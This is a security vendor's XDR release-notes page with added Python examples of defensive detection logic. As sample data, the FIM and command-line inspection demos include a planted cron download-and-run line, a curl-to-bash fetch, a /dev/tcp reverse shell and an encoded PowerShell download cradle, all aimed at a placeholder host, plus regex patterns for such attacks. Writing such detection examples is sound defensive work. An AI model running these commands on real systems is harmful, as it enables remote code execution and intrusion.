XDR Version 2 Updates
Written by Omer Kushmirski
Updated over a month ago

Introducing Software Updates

(Coming Soon)

This upcoming update gives users more control over software updates. Previously, updates for agents and the server were applied automatically; users will now be able to decide when and how to apply them, either by scheduling an update for a time that suits them or by starting it manually as needed. The aim is to let organizations manage updates in a way that minimizes disruption and fits their operational needs.

For detailed guidance on managing your software updates, please refer to the following guide.


XDR Version 2.3.29

12 Nov, 2024

This update delivers an important hotfix to reduce false positive alerts related to "Brute Force" attack detections. The rule "Credential Access | Brute Force - T1110" has been refined to improve accuracy and reduce unnecessary alerts.
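
The note above says the T1110 rule was refined to cut false positives but not how. The Python below is an added example, not CYFOX's rule logic: it contrasts a naive per-source failure count, which also fires on a user mistyping a password, with a refined rule that alerts on password spraying (many accounts from one source) or a sustained single-account brute force. The window, thresholds and sample authentication events are constructed for illustration.

```python
"""Sliding-window brute-force (T1110) detection over constructed auth events,
showing a naive rule beside a refined one that ignores a single user's typos."""
from collections import defaultdict, deque
from dataclasses import dataclass

WINDOW_SECONDS = 60  # assumed window; the product's value is not documented here


@dataclass(frozen=True)
class AuthEvent:
    ts: int        # epoch seconds
    src: str       # source address
    user: str      # target account
    success: bool


# Constructed sample telemetry (not real data): alice mistypes her password
# three times and then logs in; 203.0.113.9 sprays six accounts in six
# seconds; 198.51.100.7 hammers one account 25 times.
SAMPLE_EVENTS = [
    AuthEvent(100, "10.0.0.5", "alice", False),
    AuthEvent(110, "10.0.0.5", "alice", False),
    AuthEvent(120, "10.0.0.5", "alice", False),
    AuthEvent(125, "10.0.0.5", "alice", True),
    AuthEvent(200, "203.0.113.9", "admin", False),
    AuthEvent(201, "203.0.113.9", "root", False),
    AuthEvent(202, "203.0.113.9", "backup", False),
    AuthEvent(203, "203.0.113.9", "svc_sql", False),
    AuthEvent(204, "203.0.113.9", "guest", False),
    AuthEvent(205, "203.0.113.9", "jdoe", False),
] + [AuthEvent(300 + i, "198.51.100.7", "bob", False) for i in range(25)]


def _trim(window, now):
    """Drop entries older than WINDOW_SECONDS from a deque of (ts, user)."""
    while window and now - window[0][0] > WINDOW_SECONDS:
        window.popleft()


def naive_detect(events, threshold=3):
    """Alert on any source with >= threshold failures in the window.
    This also fires on alice's typos, i.e. a false positive."""
    alerts, windows = set(), defaultdict(deque)
    for ev in events:
        if ev.success:
            continue
        w = windows[ev.src]
        w.append((ev.ts, ev.user))
        _trim(w, ev.ts)
        if len(w) >= threshold:
            alerts.add(ev.src)
    return alerts


def refined_detect(events, spray_failures=5, spray_accounts=3,
                   single_account_failures=20):
    """Alert when one source either spreads >= spray_failures failures over
    >= spray_accounts distinct accounts (spraying) or accumulates
    >= single_account_failures failures in the window (classic brute force).
    A few failures against a single account are treated as user error."""
    alerts, windows = set(), defaultdict(deque)
    for ev in events:
        if ev.success:
            continue
        w = windows[ev.src]
        w.append((ev.ts, ev.user))
        _trim(w, ev.ts)
        distinct = len({u for _, u in w})
        if len(w) >= single_account_failures or (
                len(w) >= spray_failures and distinct >= spray_accounts):
            alerts.add(ev.src)
    return alerts
```

Running both over SAMPLE_EVENTS, the naive rule flags all three sources while the refined rule flags only the two attackers. A successful logon from a source that was just flagged is itself the highest-value event to surface; the example leaves that to the alert consumer.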


XDR Version 2.3.28

11 Nov, 2024

XDR Version 2.3.28 introduces support for uninstalling the agent directly from the server.

This new approach allows clients to remotely connect to any required agent and uninstall it, significantly reducing the complexity of managing inventory without the need for any third-party distribution tools.

A comprehensive guide to remote uninstallation can be found here.

In addition to this enhancement, Version 2.3.28 includes the following fixes:

  • Executive Summary Report: Corrected inaccuracies in the "managed devices" reporting.

  • Vulnerability Data Display: Resolved issues with incorrect data display for certain devices.

  • Improved loading times on the "Attack Hunter" page.

Lastly, in response to recent developments and evolving threats, Version 2.3.28 significantly extends the Attack Hunter engine, enabling it to detect approximately 100 new advanced attacks. These additions are based on extensive research and refined detection rules for more precise threat identification.


XDR Version 2.3.27

10 Oct, 2024

Version 2.3.27 addresses a configuration issue in File Integrity Monitoring (FIM) reported by several clients. The issue caused agents to miss certain FIM policies and a "continuous loading" indicator to appear next to some policies.

The fix ensures that FIM policies are correctly applied to agents and removes the continuous loading indicator, improving the reliability of policy deployment.


XDR Version 2.3.26

9 Oct, 2024

Version 2.3.26 includes a new Agent version (2.3.3) with changes to event handling that prevent the agent from overloading the server. The algorithm for sending events to the server has been optimized and now caps the retransmission of recurring events, so that events whose delivery failed (for example, because the endpoint had no internet connection) are not resent indefinitely.
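
The agent's actual algorithm is not described beyond the sentence above. The Python below is an added example, not the CYFOX agent's code: an outbound queue that gives each event a bounded number of delivery attempts and queues an identical recurring event only once, so an offline period does not turn into an endless stream of retries. The attempt cap, the event shape and the flaky server stand-in are assumptions made for the illustration.

```python
"""Agent-side outbound event queue with a bounded number of delivery attempts
per event and de-duplication of identical recurring events, so an outage does
not make the same failed event be resent forever."""
import hashlib
import json
from collections import OrderedDict

MAX_ATTEMPTS = 3  # assumed cap; the real agent's limit is not documented on the page


def fingerprint(event):
    """Stable identity for an event, so a recurring identical event is queued once."""
    return hashlib.sha256(json.dumps(event, sort_keys=True).encode()).hexdigest()


class OutboundQueue:
    def __init__(self, sender, max_attempts=MAX_ATTEMPTS):
        self.sender = sender            # callable(event) -> True if the server accepted it
        self.max_attempts = max_attempts
        self.pending = OrderedDict()    # fingerprint -> {"event", "attempts"}
        self.sent = []
        self.dropped = []               # given up after max_attempts failures

    def enqueue(self, event):
        fp = fingerprint(event)
        if fp not in self.pending:      # suppress duplicates already waiting
            self.pending[fp] = {"event": event, "attempts": 0}
        return fp

    def flush(self):
        """One delivery pass: every pending event gets at most one attempt."""
        for fp in list(self.pending):
            entry = self.pending[fp]
            entry["attempts"] += 1
            if self.sender(entry["event"]):
                self.sent.append(entry["event"])
                del self.pending[fp]
            elif entry["attempts"] >= self.max_attempts:
                self.dropped.append(entry["event"])
                del self.pending[fp]
        return len(self.pending)


class FlakyServer:
    """Constructed stand-in for the XDR server: rejects the first `down_calls` sends."""

    def __init__(self, down_calls):
        self.calls = 0
        self.down_calls = down_calls

    def __call__(self, event):
        self.calls += 1
        return self.calls > self.down_calls


def demo(down_calls):
    """Queue one event that recurs five times plus a heartbeat, then flush until
    the queue is empty (or ten passes). Returns counters for inspection."""
    server = FlakyServer(down_calls)
    q = OutboundQueue(server)
    recurring = {"type": "process_start", "cmd": "/usr/bin/id", "host": "web01"}
    for _ in range(5):
        q.enqueue(recurring)
    q.enqueue({"type": "heartbeat", "host": "web01"})
    passes = 0
    while q.pending and passes < 10:
        q.flush()
        passes += 1
    return {"sent": len(q.sent), "dropped": len(q.dropped),
            "server_calls": server.calls, "passes": passes}
```

With the server permanently down, demo(100) makes six sends in three passes and then stops; without the cap and the de-duplication the same input would produce a send per enqueue per pass for as long as the outage lasts. Events that hit the cap are a detection gap, so a real agent should persist them or report the gap rather than discard them silently.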

The following client-reported issues have been addressed and resolved:

  1. Agents that were not auto-updating to the latest version should now update correctly.

  2. Systems that appeared online in the portal but showed 'last sync pending' on client systems should now sync properly, allowing for accurate data and file restoration.

  3. Systems that were online but appeared offline in the portal due to the CYFOX service stopping should now display the correct status.

  4. The online agent count in the portal, which was fluctuating with every page refresh, should now remain stable.


XDR Version 2.3.25

17 Sept, 2024

XDR Version 2.3.25 introduces support for the first Linux EDR (Version 1.02.2), bringing initial prevention capabilities to Linux environments.

New Features and Enhancements in CYFOX's Linux EDR:

  1. Falco 0.38 Support (Modern eBPF): CYFOX's Linux EDR uses Falco's modern eBPF (extended Berkeley Packet Filter) probe to monitor system calls at the kernel level and detect suspicious activity. eBPF filters security events efficiently and at scale, enabling real-time detection without compromising system performance. Note that the modern eBPF probe requires a kernel with BTF support (Linux 5.8 or later).

  2. Persistent and Encrypted Local Storage: The Linux EDR now keeps data such as logs and security-related information in persistent local storage on the endpoint, so evidence and configuration state survive reboots. The storage is encrypted at rest, so it cannot be read by an unauthorized local user or from a copy of the disk; as with any at-rest encryption, it does not protect data from an attacker who has already obtained the key material on the host.

  3. Advanced Prevention Capabilities: This update enhances the system’s ability to detect and prevent malicious behavior based on command-line activity and other suspicious indicators. The integration of the Command Line Hunter library allows for deeper analysis of command-line executions, helping to identify and block potential threats in real-time.

  4. File Integrity Monitoring (FIM) Support: CYFOX's Linux EDR supports File Integrity Monitoring (FIM), which monitors essential system files and directories for unauthorized or unexpected changes. This feature helps administrators detect suspicious modifications and potential security breaches, ensuring the integrity of system configurations and compliance with security policies.
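
Item 4 describes FIM as monitoring essential files for unauthorized changes. The Python below is an added example, not the CYFOX FIM implementation: it hashes every regular file under the directories named in a policy, rehashes later and reports what was added, removed or modified, skipping symlinks so a planted link cannot drag a file outside the policy into the report. The policy path list and the /etc-like sample tree are constructed in a temporary directory for the illustration.

```python
"""Minimal File Integrity Monitoring: hash a baseline of the files under the
watched directories, rehash later, and report added, removed and modified files."""
import hashlib
import os
import tempfile


def sha256_file(path, chunk=1 << 16):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_baseline(root, watched):
    """Map relative path -> sha256 for every regular file under the watched
    directories. Symlinks are skipped so a planted link cannot make the
    monitor hash (or report) a file outside the policy's scope."""
    baseline = {}
    for rel_dir in watched:
        top = os.path.join(root, rel_dir)
        for dirpath, dirnames, filenames in os.walk(top):
            dirnames[:] = [d for d in dirnames
                           if not os.path.islink(os.path.join(dirpath, d))]
            for name in filenames:
                full = os.path.join(dirpath, name)
                if os.path.islink(full) or not os.path.isfile(full):
                    continue
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                baseline[rel] = sha256_file(full)
    return baseline


def diff_baseline(old, new):
    """Compare two baselines and return the three change classes, sorted."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def _write(root, rel, text):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(text)


def demo():
    """Constructed scenario in a temp dir: an /etc-like tree is baselined under a
    policy watching 'etc'; then sshd_config is weakened, a cron job is planted
    and a sudoers drop-in is deleted. A log file outside the policy also changes
    and must not be reported."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "etc/ssh/sshd_config", "PermitRootLogin no\n")
        _write(root, "etc/sudoers.d/ops", "%ops ALL=(ALL) ALL\n")
        _write(root, "var/log/syslog", "boot\n")
        before = build_baseline(root, ["etc"])

        _write(root, "etc/ssh/sshd_config", "PermitRootLogin yes\n")
        _write(root, "etc/cron.d/backdoor",
               "* * * * * root curl -s http://203.0.113.9/x | sh\n")
        os.remove(os.path.join(root, "etc/sudoers.d/ops"))
        _write(root, "var/log/syslog", "boot\nshutdown\n")
        after = build_baseline(root, ["etc"])
        return diff_baseline(before, after)
```

Content hashes alone miss permission and ownership changes (a world-writable sudoers file has the same hash), so a production monitor also records mode, owner and mtime, and it must keep the baseline somewhere the monitored host cannot rewrite; that is what the encrypted persistent storage in item 2 is for.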

Command Line Hunter: Advanced Real-Time Protection

CYFOX's Command Line Hunter provides real-time defense using AI-powered algorithms, continuously monitoring command lines and processes across endpoints. Its sophisticated detection capabilities analyze behaviors and patterns to identify potential threats. Once a malicious process is detected, it takes immediate action to terminate it, preventing further damage. The system also employs adaptive learning, continuously improving its detection capabilities by learning from new and emerging threats.

This update ensures robust security with enhanced detection and prevention measures tailored for
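
The Command Line Hunter section describes real-time inspection of command lines with termination of processes judged malicious, but does not show what such a decision looks like. The Python below is an added example and not CYFOX's engine: where the product is described as AI-driven, this stand-in is deliberately pattern-based. It scores each command line against a handful of behavioural indicators (download-and-execute, reverse shells, history tampering, encoded PowerShell), decodes a -EncodedCommand payload and scores the decoded script too, and maps the score to allow, alert or terminate. Patterns, weights, the threshold and the sample command lines are all constructed for the illustration.

```python
"""Rule-based command-line inspection: score each process command line against
behavioural indicators, decode -EncodedCommand payloads before scoring them,
and decide whether the process should be terminated. The product's engine is
described as AI-driven; this stand-in is deliberately pattern-based."""
import base64
import re

# (name, regex, weight). Patterns and weights are illustrative, not the product's.
INDICATORS = [
    ("download_and_execute",
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b"), 60),
    ("base64_decode_to_shell",
     re.compile(r"\bbase64\s+(-d|--decode)\b[^|]*\|\s*(ba)?sh\b"), 60),
    ("reverse_shell",
     re.compile(r"/dev/tcp/\d{1,3}(\.\d{1,3}){3}/\d+"), 80),
    ("bash_interactive_redirect",
     re.compile(r"\b(ba)?sh\s+-i\b.*[>&]"), 40),
    ("history_tamper",
     re.compile(r"\b(unset\s+HISTFILE|history\s+-c)\b"), 30),
    ("credential_file_read",
     re.compile(r"\b(cat|less|more)\b.*/etc/shadow\b"), 50),
    ("ps_download_cradle",
     re.compile(r"(?i)\b(IEX|Invoke-Expression)\b.*\b(DownloadString|Invoke-WebRequest|iwr|Net\.WebClient)\b"), 60),
    ("powershell_encoded",
     re.compile(r"(?i)\bpowershell(\.exe)?\b.*\s-(enc|encodedcommand|ec|e)\s+(?P<b64>[A-Za-z0-9+/=]{16,})"), 50),
]
BY_NAME = {name: rx for name, rx, _ in INDICATORS}
TERMINATE_THRESHOLD = 60  # assumed cut-off for taking action


def score_text(text, skip=()):
    """Return (hit names, total weight) for the indicators matching `text`."""
    hits = [(name, w) for name, rx, w in INDICATORS
            if name not in skip and rx.search(text)]
    return [n for n, _ in hits], sum(w for _, w in hits)


def decode_encoded_powershell(cmdline):
    """-EncodedCommand carries base64 of UTF-16LE text; return it decoded or None."""
    m = BY_NAME["powershell_encoded"].search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("b64"), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def inspect(cmdline):
    """Score a command line; if it carries an encoded PowerShell payload, score the
    decoded script too so that encoding does not hide the behaviour."""
    hits, score = score_text(cmdline)
    decoded = decode_encoded_powershell(cmdline)
    if decoded is not None:
        inner_hits, inner_score = score_text(decoded, skip=("powershell_encoded",))
        hits += ["decoded:" + h for h in inner_hits]
        score += inner_score
    if score >= TERMINATE_THRESHOLD:
        action = "terminate"
    elif score > 0:
        action = "alert"
    else:
        action = "allow"
    return {"score": score, "hits": hits, "action": action, "decoded": decoded}


# Constructed sample command lines (not captured telemetry).
PS_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/p.ps1')"
PS_ENCODED = base64.b64encode(PS_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_CMDLINES = [
    "ls -la /var/www",
    "echo aWQ= | base64 -d",
    "history -c",
    "curl -s http://203.0.113.9/i.sh | bash",
    "bash -i >& /dev/tcp/203.0.113.9/4444 0>&1",
    f"powershell.exe -NoP -W Hidden -Enc {PS_ENCODED}",
]


def demo():
    """Map each sample command line to the action the inspector would take."""
    return {c: inspect(c)["action"] for c in SAMPLE_CMDLINES}
```

The encoded PowerShell case is the instructive one: the raw command line only earns the "encoded" indicator, and it is the decoded script that reveals the download cradle and pushes the score over the termination threshold. Plain regexes are easy to evade (variable splitting, aliases, string concatenation), which is why the page's engine pairs command-line analysis with process behaviour rather than relying on text alone.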


XDR Version 2.3.24

2 Sept, 2024

This update includes a critical hotfix addressing an issue where USB policies were not functioning correctly in certain policy scenarios.


XDR Version 2.3.22

20 Aug, 2024

XDR Version 2.3.22 introduces support for the new Agent (version 2.3.2.0), which addresses several issues.


XDR Version 2.3.21

5 Aug, 2024

XDR Version 2.3.21 addresses several critical issues reported by our clients, improving the stability and performance of the CYFOX On-Prem Server.

The updates focus on improving user experience, particularly for those managing larger networks and extensive endpoint data.

Bug Fixes

  • Network Map Responsiveness:

    • Addressed an issue causing the Network Map page to become unresponsive and crash, particularly in environments with larger networks and queries. Users should now experience stable and smooth navigation in this section.

  • Session Termination on Forensic Tab:

    • Resolved an issue reported by clients where navigating to the Forensic tab and then to Host Events produced a "Failed to load" error and forced the user back to the login page. Forensic data is now accessible without unexpected session terminations.

  • FIM Configuration Issue: Fixed a problem where users could not add a host to FIM. The FIM configuration now correctly detects agents, so hosts can be added as expected.

Note: These fixes primarily affect users with a significant number of endpoints (1,000 or more). The update ensures a more reliable and efficient experience for managing large-scale environments.


XDR Version 2.3.20

29 July, 2024

XDR Version 2.3.20 brings several bug fixes and performance improvements, particularly for on-premises servers operating with a large number of connections (up to 10,000 agents).

Key improvements in this version include:

  • Enhanced dashboard queries for easier navigation through the dashboard screen.

  • Reduced high CPU usage caused by unoptimized user interface queries.

Additionally, this update resolves an issue with license usage count for agents that were uninstalled. Some clients experienced continued license usage even after agents were removed. From version 2.3.20 onwards, the system automatically detaches a license once an agent is uninstalled, allowing it to be reused for other endpoints.

Lastly, version 2.3.20 integrates a new agent version (2.3), which includes several bug fixes. Detailed release notes for the latest agent version can be found here.


XDR Version 2.3.19

11 July, 2024

XDR Version 2.3.19 includes performance optimizations for larger companies with up to 10,000 devices operating and reporting events.

  • Significantly faster Inventory queries, including the Inventory page, Asset Management Reports and all related queries.

  • Enhanced performance for all Vulnerability queries on the Wall, including counters and the Vulnerabilities panel with hosts.

Additional Bug Fixes:

  • Fixed the time-picker in the Date-range-picker

  • Adjusted support for agent policy rules, including the ability to delete "unknown rules".


XDR Version 2.3.18

1 July, 2024

This version mainly includes API support for the folder/file exclusion feature, starting from AG.AI version 2.2.

In addition to the API support, the new version includes the following enhancements:

  • For servers reporting to the cloud, modified the Event Prioritization Mechanism to ensure the most important events are sent before the less important ones. For example, using this logic, Attack Hunter events will be sent before Forensics events when both have the same timestamp.

  • Added an option to test the connection of a Cloud URL (see Release Notes 2.3.13 for reference) before going live.
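
The Event Prioritization Mechanism above is described by one example: Attack Hunter events go before Forensics events with the same timestamp. The Python below is an added example, not the CYFOX server's code, of an outbound queue that orders a backlog that way. It treats importance as the primary key and the timestamp as the tie-breaker within a class, which is an assumption the page leaves open, as are the ranks assigned to event classes other than Attack Hunter and Forensics and the sample backlog.

```python
"""Priority-ordered outbound queue for server-to-cloud event forwarding:
more important event classes drain first, oldest first within a class."""
import heapq
import itertools

# Lower rank = sent first. Only attack_hunter-before-forensics is stated on the
# page; the other ranks are assumed for the example.
PRIORITY = {"attack_hunter": 0, "fim": 1, "forensics": 2, "inventory": 3}
DEFAULT_RANK = max(PRIORITY.values()) + 1   # unknown classes go last


class PrioritizedOutbox:
    def __init__(self):
        self._heap = []
        self._seq = itertools.count()       # arrival order breaks full ties

    def push(self, event):
        rank = PRIORITY.get(event["source"], DEFAULT_RANK)
        heapq.heappush(self._heap, (rank, event["ts"], next(self._seq), event))

    def drain(self, budget=None):
        """Pop up to `budget` events in send order (all if budget is None),
        e.g. when the uplink only allows a limited batch per cycle."""
        out = []
        while self._heap and (budget is None or len(out) < budget):
            out.append(heapq.heappop(self._heap)[3])
        return out


def send_order(events, budget=None):
    """Return the ids of `events` in the order they would be sent."""
    box = PrioritizedOutbox()
    for ev in events:
        box.push(ev)
    return [ev["id"] for ev in box.drain(budget)]


# Constructed backlog in arrival order (ts = epoch seconds); not real telemetry.
SAMPLE = [
    {"id": "F1", "source": "forensics", "ts": 1000},
    {"id": "A1", "source": "attack_hunter", "ts": 1000},   # same ts as F1
    {"id": "I1", "source": "inventory", "ts": 999},
    {"id": "F2", "source": "forensics", "ts": 998},
    {"id": "A2", "source": "attack_hunter", "ts": 1001},
    {"id": "X1", "source": "unknown", "ts": 900},
]
```

With a budget of two per cycle, the first cycle carries only the two Attack Hunter events even though the forensics and inventory events arrived earlier; A1 is sent ahead of F1 despite the identical timestamp. If the uplink stays constrained for long, lower classes can starve, so a production queue would age low-priority items upward or reserve a share of each batch for them.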

Version 2.3.18 also addresses the following bugs reported by customers:

  • Fixed an issue where the Network Inventory report failed to download ("Failed to download PDF report").


XDR Version 2.3.17

20 Jun, 2024

Version 2.3.17 resolves a critical issue affecting the Agent, specifically the persistent UI Connection pop-up reported by our customers.


XDR Version 2.3.16

8 Jun, 2024

XDR Version 2.3.16 introduces significant enhancements and updates to the Attack Hunter engine, now capable of detecting a wider range of malicious network activities such as shellcode injection, post-exploitation enumeration, suspicious file transfers, and critical vulnerability exploits.

Additionally, the new ruleset has refined the FIM alert mechanisms to minimize false positives.

For a comprehensive and detailed view of the newly added rules, please refer to the following link.


XDR Version 2.3.14

1 June, 2024

XDR Version 2.3.14 includes API support for the new AG.AI version 2.1.1.4.


XDR Version 2.3.13

21 May, 2024

The update introduces an option for clients operating CYFOX in their own data centers to configure which cloud server (data center) the XDR server reports to.

By default, the connection is set to cloud.cyfox.com, but clients can change this to report to their own data center.

Please note that this configuration only affects the reporting mechanism and does not impact other functionalities, such as licensing, which will still be managed through cloud.cyfox.com.

To change the cloud URL, the admin user of the XDR server should go to the "System Settings" menu item and select the "Maintenance" tab. In the "License Information" panel, choose the last item (Cloud URL) and configure it manually.

In addition, the new version has resolved the following bugs:

  • Resolved the issue causing the Network Inventory Report to fail to load.

  • Fixed the failure to check for attacks notification, caused by connectivity issues.

  • Fixed the "Country" field display issue in the System Settings tab.


XDR Version 2.3.12

24 Apr, 2024

The update introduces a new feature designed for Cloud-Only clients, enabling them to manage and create new users, download agents, and update their company information details independently, without requiring access through the parent MSSP/Distributor account. For additional information, please refer to the following guide.

Additional Bug Fixes & Enhancements Implemented in Core Version 2.3.12

  • Resolved geographical display issues in the Threats Geo Map

  • Corrected data display issues in the OS Report

  • Addressed data display issues in the Hosts Report

  • Fixed date range filtering problems in the Reports Panel

  • Updated Help Center and Documentation Links


XDR Version 2.3.10

17 Mar, 2024

The latest version supports the client's local time zone instead of the UTC clock used by CYFOX servers. It automatically detects the local time zone of the server computer and presents all data, including logs, alerts and reports, in that time zone.

Lastly, this version includes significant bug fixes, particularly focusing on enhancing the reports mechanism, resolving FIM Configuration issues, and improving the "Apply Changes" functionality.


XDR Version 2.3.9

15 Jan, 2024

XDR Version 2.3.9 includes enhancements focused on the Attack Hunter engine, adding and refining detections for additional MITRE ATT&CK techniques:

  • Incorporation of 7 new "network malware" techniques.

  • Addition of a novel "Unauthorized Access" technique to identify malware infections on both network and host levels.

  • Updating of the "Information Leak" technique to detect DHCP Spoofing/MITM attacks.

  • Integration of 7 new Artificial Intelligence IOCs into the Attack Hunter.

  • Revision of 2 "External Device Manipulation" techniques to detect suspicious USB actions.

  • Enhancement of 15 "Persistence" techniques in the Attack Hunter, aiming to reduce false positive alerts and improve overall security.

  • Introduction of a new "Deobfuscate/Decode Files or Information" signature to the Attack Hunter.

  • Updating of 20 "Defense Evasion" techniques to elevate security measures.

  • Introduction of 6 new "Discovery" techniques to the Attack Hunter.

  • Addition of 2 new "Proxy" techniques to the Attack Hunter, specifically geared towards the detection of advanced attacks and malware.

  • Refinement of 3 "Lateral Movement" techniques to reduce false positive alerts.

  • Updating of 5 "Execution" techniques to minimize false positive alerts and enhance accuracy.

Additionally, this version addresses critical bug fixes and performance issues, including:

  • Resolution of Attack Hunter configuration issues.

  • Addition of Timezone conversion to the client’s timezone and formatting date based on client system preferences.

  • EDR Support Extension in the UI.

  • Resolution of USB Policy design issues and bugs.

  • Addition of Google Captcha to the "Forgot password" page.

  • Fixing the "Apply changes" button issue.

  • Query optimization for the Forensics Host/User events query.

  • Resolution of the issue preventing page changes inside Host Services.
